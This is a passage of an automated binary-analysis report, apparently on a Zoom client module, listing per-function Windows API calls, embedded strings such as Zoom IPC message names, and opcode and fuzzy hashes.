                • Opcode Fuzzy Hash: 88c68873c910cac29a87b4e8014761c772658a4801a44ea59c74f2741dfe3791
                • Instruction Fuzzy Hash: B1F0F6F4A88B40AFE730AB909C47B5FB2A0BB00B05F40452CF5552A2C1CBF40648DBB8
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6ABC7
                • ??0?$CmmMessageTemplate_7@_JV?$CStringT@_W@Cmm@@V12@V12@V12@V12@V12@@Archive@Cmm@@QAE@PBDH0000000@Z.RWSNDPQSKZ(com.Zoom.app.conf.joinFailForForceUpdate,00002734,MeetingNo,Password,WebClientLink,MinClientVersion,JoinType,JMAK,VanityID,00000004), ref: 00C6ABFE
                  • Part of subcall function 00C7D1C0: __EH_prolog3.LIBCMT ref: 00C7D1C7
                  • Part of subcall function 00C7D1C0: ??0?$CmmMessageTemplate_6@_JV?$CStringT@_W@Cmm@@V12@V12@V12@V12@@Archive@Cmm@@QAE@PBDH000000@Z.RWSNDPQSKZ(?,?,?,?,?,?,?,?,00000004,00C6AC03,com.Zoom.app.conf.joinFailForForceUpdate,00002734,MeetingNo,Password,WebClientLink,MinClientVersion), ref: 00C7D1E9
                  • Part of subcall function 00C89C7B: __EH_prolog3_GS.LIBCMT ref: 00C89C82
                  • Part of subcall function 00C89C7B: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6AC2A), ref: 00C89C96
                  • Part of subcall function 00C89C7B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.joinFailForForceUpdate,00000044,00C6AC2A), ref: 00C89CC8
                  • Part of subcall function 00C89C7B: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(00000044,-00000004,com.Zoom.app.conf.joinFailForForceUpdate,00000044,00C6AC2A), ref: 00C89D05
                  • Part of subcall function 00C89C7B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.joinFailForForceUpdate,00000044,-00000004,com.Zoom.app.conf.joinFailForForceUpdate,00000044,00C6AC2A), ref: 00C89D37
                Strings
                Similarity
                • API ID: Cmm@@$V12@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@V12@@$H0000000@H000000@H_prolog3_Node@23@Root@Template_6@_Template_7@_Tree
                • String ID: JMAK$JoinType$MeetingNo$MinClientVersion$Password$VanityID$WebClientLink$com.Zoom.app.conf.joinFailForForceUpdate
                • API String ID: 1788101684-2579841256
                • Opcode ID: 75aa52dde3285b9e7e27d1b79e77be8cfe62778ffe5ea93e7ea2a85943ad6e59
                • Instruction ID: 9fbc2757f36066b584c92d951f1f854121f238d379d0feca7c5688b823cf92fa
                • Opcode Fuzzy Hash: 75aa52dde3285b9e7e27d1b79e77be8cfe62778ffe5ea93e7ea2a85943ad6e59
                • Instruction Fuzzy Hash: B0F0A071684B50BED3147754BC0BB2E6AA0AB40F59F400518B1153E2D9CBF10B4886B1
                APIs
                • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00CDA55C
                • WinVerifyTrust.WINTRUST(000000FF,00AAC56B,?), ref: 00CDA5F3
                • WinVerifyTrust.WINTRUST(000000FF,00AAC56B,00000034), ref: 00CDA614
                • WinVerifyTrust.WINTRUST(000000FF,00AAC56B,00000034), ref: 00CDA632
                • GetProcessHeap.KERNEL32(00000000,?), ref: 00CDA684
                • HeapFree.KERNEL32(00000000), ref: 00CDA68B
                • WinVerifyTrust.WINTRUST(000000FF,00AAC56B,00000034), ref: 00CDA6A2
                Strings
                Similarity
                • API ID: TrustVerify$Heap$CreateFileFreeProcess
                • String ID: 4
                • API String ID: 844456146-4088798008
                • Opcode ID: 18784b9fa982997751b8c6cbbf3a8a2a07f3097b70aed6c21f6eb1ed44c70240
                • Instruction ID: 27eeb1adca1c0c58182f32b434bb9eddc0e4bc1db3e870d55d07e77056802e3a
                • Opcode Fuzzy Hash: 18784b9fa982997751b8c6cbbf3a8a2a07f3097b70aed6c21f6eb1ed44c70240
                • Instruction Fuzzy Hash: 62515FB1D0034DEBDB10DF98C884BDEBBB5BB48314F148219E925BB380D77499858F61
                APIs
                • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000,00DEF0D0,?,?), ref: 00CDA74A
                • WinVerifyTrust.WINTRUST(000000FF,00AAC56B,?), ref: 00CDA7B5
                • WinVerifyTrust.WINTRUST(000000FF,00AAC56B,00000034), ref: 00CDA7D6
                • WinVerifyTrust.WINTRUST(000000FF,00AAC56B,00000034), ref: 00CDA7F4
                • GetProcessHeap.KERNEL32(00000000,?), ref: 00CDA80E
                • HeapFree.KERNEL32(00000000), ref: 00CDA815
                • WinVerifyTrust.WINTRUST(000000FF,00AAC56B,00000034), ref: 00CDA82C
                • CloseHandle.KERNEL32(00000000), ref: 00CDA845
                Strings
                Similarity
                • API ID: TrustVerify$Heap$CloseCreateFileFreeHandleProcess
                • String ID: 4
                • API String ID: 2170017040-4088798008
                • Opcode ID: 02e2855df0d60f0347b7e46209de3d90b2ca8cf16e786a9c9e90e3bb9fc59e16
                • Instruction ID: 3d5ba0dca874b5719e8354765d98d425a0adce097f0eb63ba55b1b2364842fb4
                • Opcode Fuzzy Hash: 02e2855df0d60f0347b7e46209de3d90b2ca8cf16e786a9c9e90e3bb9fc59e16
                • Instruction Fuzzy Hash: B3411CB1D00318AFDB10DF99DC88BDEBBB9AB04324F10422AE925B73D0DB7459498F61
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CAE0B7
                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000294,00CAE9BE,?,?), ref: 00CAE0E4
                • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00CAE1C1
                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00CAE1D3
                • CloseHandle.KERNEL32(?), ref: 00CAE1DF
                • CloseHandle.KERNEL32(?), ref: 00CAE1EB
                • MessageBoxW.USER32(00000000,?,Fatal error,00040010), ref: 00CAE213
                Strings
                Similarity
                • API ID: CloseHandle$CreateFileH_prolog3_MessageModuleNameObjectProcessSingleWait
                • String ID: Fatal error$debug_message.exe
                • API String ID: 1227367235-2234747147
                • Opcode ID: 1a7079662009139cc40ca9dcaaa0511d722e179aa97dd15019a9a8710098c5f8
                • Instruction ID: 50c55094c3f640034debf3311799bae16e2804ce7b1776cc6d34ab1bc6135b28
                • Opcode Fuzzy Hash: 1a7079662009139cc40ca9dcaaa0511d722e179aa97dd15019a9a8710098c5f8
                • Instruction Fuzzy Hash: B0319C71800229AFDF20DB54DC8CBE9B7B8FF05305F0042E9E108A21A0DB749B89CFA5
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6A6B7
                • ??0?$CmmMessageTemplate_6@IV?$CStringT@_W@Cmm@@IV12@V12@H@Archive@Cmm@@QAE@PBDH000000@Z.RWSNDPQSKZ(com.zoom.app.notifyUserInputProxyAuth,00002730,TheProxyType,Server,Port,UserName,Password,Cancel,00000004), ref: 00C6A6E9
                  • Part of subcall function 00C7D580: __EH_prolog3.LIBCMT ref: 00C7D587
                  • Part of subcall function 00C7D580: ??0?$CmmMessageTemplate_5@IV?$CStringT@_W@Cmm@@IV12@V12@@Archive@Cmm@@QAE@PBDH00000@Z.RWSNDPQSKZ(?,?,?,?,?,?,?,00000004,00C6A6EE,com.zoom.app.notifyUserInputProxyAuth,00002730,TheProxyType,Server,Port,UserName,Password), ref: 00C7D5A6
                  • Part of subcall function 00C893F2: __EH_prolog3_GS.LIBCMT ref: 00C893F9
                  • Part of subcall function 00C893F2: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6A715), ref: 00C8940D
                  • Part of subcall function 00C893F2: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.notifyUserInputProxyAuth,00000044,00C6A715), ref: 00C8943F
                  • Part of subcall function 00C893F2: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,com.zoom.app.notifyUserInputProxyAuth,00000044), ref: 00C8947C
                  • Part of subcall function 00C893F2: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.notifyUserInputProxyAuth,?,-00000004,com.zoom.app.notifyUserInputProxyAuth,00000044), ref: 00C894AE
                Strings
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$ArchiveV12@$H_prolog3MessagePackageTree@$H000000@H00000@H_prolog3_Node@23@Root@Template_5@Template_6@TreeV12@@
                • String ID: Cancel$Password$Port$Server$TheProxyType$UserName$com.zoom.app.notifyUserInputProxyAuth
                • API String ID: 1744605436-225641350
                • Opcode ID: 6512b3b1fc3a0912fa86f4f10d5263b805af573168c7ac44e7a47b81eca2ffdc
                • Instruction ID: d06f56faf99b90df8f7b02a59d45f1c207948156ec683be8d6cb78642f339908
                • Opcode Fuzzy Hash: 6512b3b1fc3a0912fa86f4f10d5263b805af573168c7ac44e7a47b81eca2ffdc
                • Instruction Fuzzy Hash: 7AE06DB0680B51AED7207B98BC4BB1E6AB0BB00B58F440528B1096E2EACBF00548D776
                APIs
                • _free.LIBCMT ref: 00CFEAE7
                  • Part of subcall function 00CFE54D: HeapFree.KERNEL32(00000000,00000000,?,00D082A9,?,00000000,?,?,?,00D0854C,?,00000007,?,?,00D089A1,?), ref: 00CFE563
                  • Part of subcall function 00CFE54D: GetLastError.KERNEL32(?,?,00D082A9,?,00000000,?,?,?,00D0854C,?,00000007,?,?,00D089A1,?,?), ref: 00CFE575
                • _free.LIBCMT ref: 00CFEAF3
                • _free.LIBCMT ref: 00CFEAFE
                • _free.LIBCMT ref: 00CFEB09
                • _free.LIBCMT ref: 00CFEB14
                • _free.LIBCMT ref: 00CFEB1F
                • _free.LIBCMT ref: 00CFEB2A
                • _free.LIBCMT ref: 00CFEB35
                • _free.LIBCMT ref: 00CFEB40
                • _free.LIBCMT ref: 00CFEB4E
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 8c2221f7e735ef5944f12220ad2953b2478db332b9b94ca9cdac58d3a3b65df0
                • Instruction ID: 592aefe9ca89acecc2094ac2df8551d33ed91ca4a7fbc0a01bafc0ef4ef2dd8c
                • Opcode Fuzzy Hash: 8c2221f7e735ef5944f12220ad2953b2478db332b9b94ca9cdac58d3a3b65df0
                • Instruction Fuzzy Hash: E421B67690010CEFCF81EF94C891DEE7BB9BF18344B4445A6B6159B131EB31EA44EB81
                APIs
                • __EH_prolog3.LIBCMT ref: 00CDEED2
                  • Part of subcall function 00CDCAC4: EnterCriticalSection.KERNEL32(00DFFB90,00000000,?), ref: 00CDCADF
                  • Part of subcall function 00CDCAC4: GetCurrentThreadId.KERNEL32 ref: 00CDCAE5
                  • Part of subcall function 00CDCAC4: LeaveCriticalSection.KERNEL32(00DFFB90,?,00000000,?,?), ref: 00CDCB3D
                  • Part of subcall function 00CDBFE5: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(144E8D40,F7F48D8D,00CDCB1F,00CDD788,00DFFB90,000762E8,00CDCB1F,00DFFB90,?,?,?,00CDCB1F,00DFFB90,?), ref: 00CDBFFE
                  • Part of subcall function 00CDCC2E: __EH_prolog3.LIBCMT ref: 00CDCC35
                  • Part of subcall function 00CE245F: __EH_prolog3.LIBCMT ref: 00CE2466
                • GetFileAttributesW.KERNEL32(00E00008,?,meetinginfo.log,?,0000002C,00CDFDD4,?,00000354,00CE042C,?), ref: 00CDF019
                Strings
                Similarity
                • API ID: H_prolog3$CriticalSection$AttributesCmm@@CurrentEnterFileLeaveState@ThreadUnlock@
                • String ID: A file with such a destination name already exists.$Invalid destination file name specified.$Meeting Information$Success.$Unspecified error - add file: %s, %s$meetinginfo.log
                • API String ID: 1546090958-3647361996
                • Opcode ID: 357c33ddf6b6557eb3d7eabf19bda68321e9ee6ba719e33307cce63ecad6f4e5
                • Instruction ID: 5afd531b74440507c9dc9db0bda859f1a3e3c8334198007cfe358167de55084b
                • Opcode Fuzzy Hash: 357c33ddf6b6557eb3d7eabf19bda68321e9ee6ba719e33307cce63ecad6f4e5
                • Instruction Fuzzy Hash: 8D816372D0011AABDB14EBA4DC91AFEB779BF54310F54042AF616A7382EF306E45E760
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C5ED4B
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000003,0000000F,?,00000000,000000D4,00C5C383,?,?,?,?,?,?,?,00000020), ref: 00C5EDD8
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(00D34CD0,tmStartTime,eventType,entryId,00000000), ref: 00C5EE8C
                • ?Assign@?$CStringT@D@Cmm@@QAEXPBD@Z.RWSNDPQSKZ(00000000,00000000,indentation), ref: 00C5EFFD
                  • Part of subcall function 00C5F1A8: __EH_prolog3_GS.LIBCMT ref: 00C5F1B2
                  • Part of subcall function 00C5F1A8: ??0?$CStringT@D@Cmm@@QAE@PBD@Z.RWSNDPQSKZ(-00000004,00000000,0000008C,00C5EF3B,?,?,?,?,?,?,00D34CD0,tmStartTime,eventType,entryId,00000000), ref: 00C5F214
                Strings
                Similarity
                • API ID: Cmm@@$String$??0?$H_prolog3_$Assign@?$State@Unlock@
                • String ID: entryId$eventType$indentation$tmStartTime
                • API String ID: 1592417975-1790541018
                • Opcode ID: e4750dd217f9eaf418876d0731dc07811ca91be98c6b2baffd78402347adff00
                • Instruction ID: fdd0a5ff35d1e5b3e9a49a34e17ac9cf74afc078119371a8c8850e0a1c3e11a5
                • Opcode Fuzzy Hash: e4750dd217f9eaf418876d0731dc07811ca91be98c6b2baffd78402347adff00
                • Instruction Fuzzy Hash: 0A918D35D00258DBCF18EBA8C881BEDB7B5AF55300F24419AE81677282EF706F89DB55
                APIs
                • ?SkipWhiteSpace@XMLUtil@tinyxml2@@SAPBDPBDPAH@Z.RWSNDPQSKZ(?,?), ref: 00CB0255
                  • Part of subcall function 00CA4220: ?IsWhiteSpace@XMLUtil@tinyxml2@@SA_ND@Z.RWSNDPQSKZ(00000001,?,?,00CB2A18,?,?,?,?,00CB27FC), ref: 00CA422B
                  • Part of subcall function 00CA4220: ?IsWhiteSpace@XMLUtil@tinyxml2@@SA_ND@Z.RWSNDPQSKZ(00000001,?,?,?,00CB2A18,?,?,?,?,00CB27FC), ref: 00CA4249
                • ?StringEqual@XMLUtil@tinyxml2@@SA_NPBD0H@Z.RWSNDPQSKZ(00000000,00D3CE58,00000002), ref: 00CB0276
                Strings
                Similarity
                • API ID: Util@tinyxml2@@$Space@White$Equal@SkipString
                • String ID: <!--$<![CDATA[
                • API String ID: 1841086794-371368006
                • Opcode ID: 5a66a4379655da36efe2bb3c452d1da8ec2fa5b4a96928bd91de7f1eef16182b
                • Instruction ID: fd7d0ddccaf96df2740b3d5e843ac9461f84c1f92716d0031582375612c4f1c3
                • Opcode Fuzzy Hash: 5a66a4379655da36efe2bb3c452d1da8ec2fa5b4a96928bd91de7f1eef16182b
                • Instruction Fuzzy Hash: 2531AC71B40211AFCB04DB24D886FDA77E9AF96304F240065F809AB356E774EE49C7D1
                APIs
                • ?Write@XMLPrinter@tinyxml2@@IAEXPBDI@Z.RWSNDPQSKZ(?,?), ref: 00CB2D6F
                • ?Write@XMLPrinter@tinyxml2@@IAEXPBDI@Z.RWSNDPQSKZ(?,?), ref: 00CB2DB2
                • ?Putc@XMLPrinter@tinyxml2@@IAEXD@Z.RWSNDPQSKZ(00000026), ref: 00CB2DDB
                • ?Write@XMLPrinter@tinyxml2@@IAEXPBDI@Z.RWSNDPQSKZ(?,?), ref: 00CB2DF2
                • ?Putc@XMLPrinter@tinyxml2@@IAEXD@Z.RWSNDPQSKZ(0000003B,?,?), ref: 00CB2DFB
                • ?Write@XMLPrinter@tinyxml2@@IAEXPBDI@Z.RWSNDPQSKZ(?,?), ref: 00CB2E23
                • ?Write@XMLPrinter@tinyxml2@@IAEXPBD@Z.RWSNDPQSKZ(?), ref: 00CB2E2B
                Strings
                Similarity
                • API ID: Printer@tinyxml2@@$Write@$Putc@
                • String ID: &#x%02X;
                • API String ID: 1150459937-1586712390
                • Opcode ID: 6614a987cf66bd37f55b7e00cf8d6518566527c807982b8dc37b40b7cd676d59
                • Instruction ID: e354fee6d03415174b9c1d04de70caf7624b7a0797e52171747b872229a46912
                • Opcode Fuzzy Hash: 6614a987cf66bd37f55b7e00cf8d6518566527c807982b8dc37b40b7cd676d59
                • Instruction Fuzzy Hash: 3531AD71A001545FDB05DB7AC891AFFBBFADF85301F14816AE051AB391CB259D06D7A0
                APIs
                • __EH_prolog3.LIBCMT ref: 00CDED88
                • GetCurrentThreadId.KERNEL32 ref: 00CDEDA4
                  • Part of subcall function 00CDCAC4: EnterCriticalSection.KERNEL32(00DFFB90,00000000,?), ref: 00CDCADF
                  • Part of subcall function 00CDCAC4: GetCurrentThreadId.KERNEL32 ref: 00CDCAE5
                  • Part of subcall function 00CDCAC4: LeaveCriticalSection.KERNEL32(00DFFB90,?,00000000,?,?), ref: 00CDCB3D
                • EnterCriticalSection.KERNEL32(?,dbghelp.dll,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?), ref: 00CDEDC5
                • _set_unexpected.LIBVCRUNTIME ref: 00CDEE32
                • LeaveCriticalSection.KERNEL32(?,?,?,?,?), ref: 00CDEEBA
                Strings
                • Success., xrefs: 00CDEEA3, 00CDEEAF
                • Unspecified error - SetThreadExceptionHandlers: %x, %d., xrefs: 00CDEDB1
                • Can't install handlers for current thread twice., xrefs: 00CDEDF8
                Similarity
                • API ID: CriticalSection$CurrentEnterLeaveThread$H_prolog3_set_unexpected
                • String ID: Can't install handlers for current thread twice.$Success.$Unspecified error - SetThreadExceptionHandlers: %x, %d.
                • API String ID: 2198388211-1398901415
                • Opcode ID: 687050b4af121a4f19afa82a7f4856c6e52f8b7ff263c9e12ef840ff6a837c9d
                • Instruction ID: 9f068075c5cd78b6409543dd0a40615c20118a52e7195b494de8bccadb78d05e
                • Opcode Fuzzy Hash: 687050b4af121a4f19afa82a7f4856c6e52f8b7ff263c9e12ef840ff6a837c9d
                • Instruction Fuzzy Hash: 0F4154B5E00309ABDB14EFA9D485AEEB7B5EF48710F24401BF915EB381CB709941CBA5
                APIs
                • DecodePointer.KERNEL32(?,?,?,00D0E71B,00DFF8D0,?,?,?,00CDC444,00000000), ref: 00D0E3E7
                • LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800,?,?,?,00D0E71B,00DFF8D0,?,?,?,00CDC444,00000000), ref: 00D0E3FC
                • DecodePointer.KERNEL32(?), ref: 00D0E478
                Similarity
                • API ID: DecodePointer$LibraryLoad
                • String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
                • API String ID: 1423960858-1745123996
                • Opcode ID: bba7fe310d9345e0e3c4b871cd668a92f52a9f07cf5b9e316a6131b9b77657ff
                • Instruction ID: 22ac11f19da31dcf290ef7fd9984d2d88edf175fc5d77b591a23e7ab54a4f46c
                • Opcode Fuzzy Hash: bba7fe310d9345e0e3c4b871cd668a92f52a9f07cf5b9e316a6131b9b77657ff
                • Instruction Fuzzy Hash: F401C0706403147BDA016B20AE07BED3B56CF1278DF088861FC49A72D2EBA1D90DC2B9
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6E2A7
                • ??0?$CmmMessageTemplate_5@HV?$CStringT@_W@Cmm@@V12@V12@V12@@Archive@Cmm@@QAE@PBDH00000@Z.RWSNDPQSKZ(com.zoom.app.assistant.control.system.do.operation.request,00009D15,Type,DeviceID,MethodID,ParamID,Value,00000004), ref: 00C6E2D6
                  • Part of subcall function 00C7B9D0: __EH_prolog3.LIBCMT ref: 00C7B9D7
                  • Part of subcall function 00C7B9D0: ??0?$CmmMessageTemplate_4@HV?$CStringT@_W@Cmm@@V12@V12@@Archive@Cmm@@QAE@PBDH0000@Z.RWSNDPQSKZ(?,?,?,?,?,?,00000004,00C6E2DB,com.zoom.app.assistant.control.system.do.operation.request,00009D15,Type,DeviceID,MethodID,ParamID,Value,00000004), ref: 00C7B9F3
                  • Part of subcall function 00C8E502: __EH_prolog3_GS.LIBCMT ref: 00C8E509
                  • Part of subcall function 00C8E502: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000058,00C6E315,com.zoom.app.assistant.control.system.do.operation.request,Type,DeviceID,MethodID,ParamID,Value,com.zoom.app.assistant.control.system.do.operation.request,00009D15,Type,DeviceID,MethodID,ParamID,Value,00000004), ref: 00C8E541
                  • Part of subcall function 00C8E502: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000058,00C6E315,com.zoom.app.assistant.control.system.do.operation.request,Type,DeviceID,MethodID,ParamID,Value,com.zoom.app.assistant.control.system.do.operation.request,00009D15,Type,DeviceID,MethodID,ParamID), ref: 00C8E56F
                  • Part of subcall function 00C8E502: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000058,00C6E315,com.zoom.app.assistant.control.system.do.operation.request,Type,DeviceID,MethodID,ParamID,Value,com.zoom.app.assistant.control.system.do.operation.request,00009D15,Type,DeviceID,MethodID), ref: 00C8E5AC
                  • Part of subcall function 00C8E502: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000058,00C6E315,com.zoom.app.assistant.control.system.do.operation.request,Type,DeviceID,MethodID,ParamID,Value,com.zoom.app.assistant.control.system.do.operation.request,00009D15,Type), ref: 00C8E5DC
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$ArchiveV12@$H_prolog3MessagePackageTree@V12@@$H00000@H0000@H_prolog3_Node@23@Root@Template_4@Template_5@Tree
                • String ID: DeviceID$MethodID$ParamID$Type$Value$com.zoom.app.assistant.control.system.do.operation.request
                • API String ID: 281469360-3067624559
                • Opcode ID: 02813e15bfbceb7b721285ee22cae1af182679594588ab4f47656029d9e4d299
                • Instruction ID: 598a0b3798f4d93317c0b85e4e81b32ea7a0eb2f2b68155e2d8a4082b4fae095
                • Opcode Fuzzy Hash: 02813e15bfbceb7b721285ee22cae1af182679594588ab4f47656029d9e4d299
                • Instruction Fuzzy Hash: CEF0A0B17807D6BFE7106B415C07F6A6264A740F5FF448429B2046A3DACBF08A08DBB4
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6E977
                • ??0?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@IHV12@I@Archive@Cmm@@QAE@PBDH00000@Z.RWSNDPQSKZ(com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,00009DD6,deviceID,deviceType,selectNotFoundDevice,channelName,signalType,00000004), ref: 00C6E9A6
                  • Part of subcall function 00C7B810: __EH_prolog3.LIBCMT ref: 00C7B817
                  • Part of subcall function 00C7B810: ??0?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@IHV12@@Archive@Cmm@@QAE@PBDH0000@Z.RWSNDPQSKZ(?,?,?,?,?,?,00000004,00C6E9AB,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,00009DD6,deviceID,deviceType,selectNotFoundDevice,channelName,signalType,00000004), ref: 00C7B833
                  • Part of subcall function 00C8EAC0: __EH_prolog3_GS.LIBCMT ref: 00C8EAC7
                  • Part of subcall function 00C8EAC0: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C6E9D5,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,?,?,selectNotFoundDevice,?,?,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,00009DD6,deviceID,deviceType,selectNotFoundDevice,channelName,signalType,00000004), ref: 00C8EAE7
                  • Part of subcall function 00C8EAC0: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C6E9D5,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,?,?,selectNotFoundDevice,?,?,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,00009DD6,deviceID,deviceType,selectNotFoundDevice,channelName), ref: 00C8EB15
                  • Part of subcall function 00C8EAC0: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000048,00C6E9D5,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,?,?,selectNotFoundDevice,?,?,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,00009DD6,deviceID,deviceType,selectNotFoundDevice), ref: 00C8EB52
                  • Part of subcall function 00C8EAC0: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000048,00C6E9D5,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,?,?,selectNotFoundDevice,?,?,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,00009DD6,deviceID), ref: 00C8EB82
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@$H00000@H0000@H_prolog3_Node@23@Root@Template_4@Template_5@TreeV12@V12@@
                • String ID: channelName$com.zoom.app.assistant.virtualaudio.message.set.selected.device.request$deviceID$deviceType$selectNotFoundDevice$signalType
                • API String ID: 859509072-2625786810
                • Opcode ID: 70444e82fef1459f982d0971b14fd9716941018156bae301d0c582c10dfd60d7
                • Instruction ID: 4a5a40d4b71afd4b9fdfe534855bec18a96b9c29c21b983632ee498576f3482f
                • Opcode Fuzzy Hash: 70444e82fef1459f982d0971b14fd9716941018156bae301d0c582c10dfd60d7
                • Instruction Fuzzy Hash: CFF0A0F0651398BFE7246B15CC4BF6B2598E745BA4F808A5CB1046A3C2DBF0A804D77C
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6EA97
                • ??0?$CmmMessageTemplate_5@V?$CStringT@D@Cmm@@IHV12@I@Archive@Cmm@@QAE@PBDH00000@Z.RWSNDPQSKZ(com.zoom.app.assistant.virtualaudio.message.set.selected.device.response,00009DD7,deviceID,deviceType,result,channelName,signalType,00000004), ref: 00C6EAC6
                  • Part of subcall function 00C7B810: __EH_prolog3.LIBCMT ref: 00C7B817
                  • Part of subcall function 00C7B810: ??0?$CmmMessageTemplate_4@V?$CStringT@D@Cmm@@IHV12@@Archive@Cmm@@QAE@PBDH0000@Z.RWSNDPQSKZ(?,?,?,?,?,?,00000004,00C6E9AB,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,00009DD6,deviceID,deviceType,selectNotFoundDevice,channelName,signalType,00000004), ref: 00C7B833
                  • Part of subcall function 00C8EAC0: __EH_prolog3_GS.LIBCMT ref: 00C8EAC7
                  • Part of subcall function 00C8EAC0: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C6E9D5,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,?,?,selectNotFoundDevice,?,?,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,00009DD6,deviceID,deviceType,selectNotFoundDevice,channelName,signalType,00000004), ref: 00C8EAE7
                  • Part of subcall function 00C8EAC0: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C6E9D5,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,?,?,selectNotFoundDevice,?,?,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,00009DD6,deviceID,deviceType,selectNotFoundDevice,channelName), ref: 00C8EB15
                  • Part of subcall function 00C8EAC0: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000048,00C6E9D5,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,?,?,selectNotFoundDevice,?,?,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,00009DD6,deviceID,deviceType,selectNotFoundDevice), ref: 00C8EB52
                  • Part of subcall function 00C8EAC0: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000048,00C6E9D5,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,?,?,selectNotFoundDevice,?,?,com.zoom.app.assistant.virtualaudio.message.set.selected.device.request,00009DD6,deviceID), ref: 00C8EB82
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@$H00000@H0000@H_prolog3_Node@23@Root@Template_4@Template_5@TreeV12@V12@@
                • String ID: channelName$com.zoom.app.assistant.virtualaudio.message.set.selected.device.response$deviceID$deviceType$result$signalType
                • API String ID: 859509072-4167536049
                • Opcode ID: 8234dda542c10a6ba5730e7dafa505ab174813b14995c8380e5ccd44eea676d4
                • Instruction ID: 548eae501ec089207cb575cbb472e40f70a30e43b92c64c186f885db137432b9
                • Opcode Fuzzy Hash: 8234dda542c10a6ba5730e7dafa505ab174813b14995c8380e5ccd44eea676d4
                • Instruction Fuzzy Hash: 11F055F0A413807FE7146B05CC8BF2B25A8E740F91F50845C72045A3C2CAF04C04D279
                APIs
                • __EH_prolog3.LIBCMT ref: 00C72197
